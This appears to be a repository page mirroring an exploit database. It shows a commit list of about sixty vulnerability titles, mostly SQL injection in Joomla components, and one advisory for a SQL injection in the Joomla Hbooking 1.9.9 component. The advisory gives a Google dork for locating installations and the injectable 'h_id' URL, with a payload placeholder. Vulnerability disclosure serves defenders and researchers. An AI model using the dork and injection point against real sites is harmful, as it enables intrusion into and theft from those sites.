d548da5f4f
20 new exploits Nokia N95-8 - browser (setAttributeNode) Method Crash Nokia N95-8 browser - 'setAttributeNode' Method Crash Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Got All Media 7.0.0.3 - Remote Denial of Service GeoVision Digital Video Surveillance System - (geohttpserver) DT GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure pHNews alpha 1 - (templates_dir) Remote Code Execution pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection Den Dating 9.01 - 'searchmatch.php' SQL Injection InselPhoto 1.1 - (query) SQL Injection PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection InselPhoto 1.1 - 'query' Parameter SQL Injection PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection Vlinks 1.1.6 - 'id' SQL Injection Vlinks 1.1.6 - 'id' Parameter SQL Injection CmsFaethon 2.2.0 - info.php item SQL Command Injection InselPhoto 1.1 - Persistent Cross-Site Scripting CmsFaethon 2.2.0 - 'item' Parameter SQL Injection InselPhoto 1.1 - Cross-Site Scripting SAS Hotel Management System - 'myhotel_info.asp' SQL Injection YACS CMS 8.11 - update_trailer.php Remote File Inclusion SAS Hotel Management System - 'id' Parameter SQL Injection YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion pHNews Alpha 1 - 'header.php mod' SQL Injection pHNews Alpha 1 - 'mod' Parameter SQL Injection Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting Novaboard 1.0.1 - Cross-Site Scripting Joomla! Component JE Quiz - Blind SQL Injection Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection SAS Hotel Management System - user_login.asp SQL Injection SAS Hotel Management System - 'notfound' Parameter SQL Injection JE Messenger 1.0 - Arbitrary File Upload Joomla! Component JE Messenger 1.0 - Arbitrary File Upload Joomla! Component 'com_jeauto' - Local File Inclusion Joomla! Component JE Auto - Local File Inclusion vlinks 2.0.3 - 'site.php id Parameter' SQL Injection Vlinks 2.0.3 - 'id' Parameter SQL Injection Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection PHP Marketplace Script - SQL Injection Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection Joomla! Component JE Property Finder 1.6.3 - SQL Injection Joomla! Component JE Tour 2.0 - SQL Injection Joomla! Component JE Video Rate 1.0 - SQL Injection Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Awd Song 1.8 - SQL Injection Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection Joomla! Component JE Quiz 2.3 - SQL Injection Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Ticket System 1.2 - SQL Injection Joomla! Component JE Messanger - SQL Injection
17 lines
No EOL
680 B
Text
Executable file
17 lines
No EOL
680 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component Hbooking 1.9.9 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_hbooking
|
|
# Date: 13.02.2017
|
|
# Vendor Homepage: http://www.joomlaextension.biz/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/hbooking/
|
|
# Demo: http://www.joomlaextension.biz/demo/
|
|
# Version: 1.9.9
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=[SQL]
|
|
# # # # # |